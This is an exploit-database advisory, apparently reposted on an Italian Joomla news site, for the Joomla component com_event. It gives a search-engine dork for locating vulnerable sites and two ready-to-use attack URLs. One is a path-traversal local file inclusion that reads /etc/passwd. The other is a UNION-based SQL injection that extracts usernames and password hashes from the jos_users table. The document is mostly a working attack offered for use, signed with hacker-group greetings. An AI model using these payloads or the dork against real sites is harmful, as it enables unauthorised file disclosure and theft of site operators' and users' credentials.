Joomla Component com_event Multiple Vulnerabilities

Creato Domenica, 30 Maggio 2010 17:35

# Title: Joomla Component com_event Multiple Vulnerabilities
# EDB-ID: 12633
# CVE-ID: ()
# OSVDB-ID: ()
# Author: altbta
# Published: 2010-05-17
# Verified: yes
# Download Exploit Code
# Download N/A

view source

print ?

####################################################################

>>>>> Author : altbta  (
 Questo indirizzo email è protetto dagli spambots. E' necessario abilitare JavaScript per vederlo.
 )

>>>>> Home : [v4-team.com].[xp10.me]

>>>>> Script : Joomla Component com_event

>>>>> Bug Type : Multiple Vulnerabilities

>>>>> Dork : inurl:"com_event"

####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_event&view=[LFI]

http://site/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00

'

===[ Exploit ]=== [sql]

http://site/index.php?option=com_event&task=details&sid=61 [sql]

http://site/index.php?option=com_event&task=details&sid=-61 union select

1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--

####################################################################

RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3

Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito

SnIpEr.SiTeS

Categoria: Vulnerabilità Joomla

Joomla SEF URLs by Artio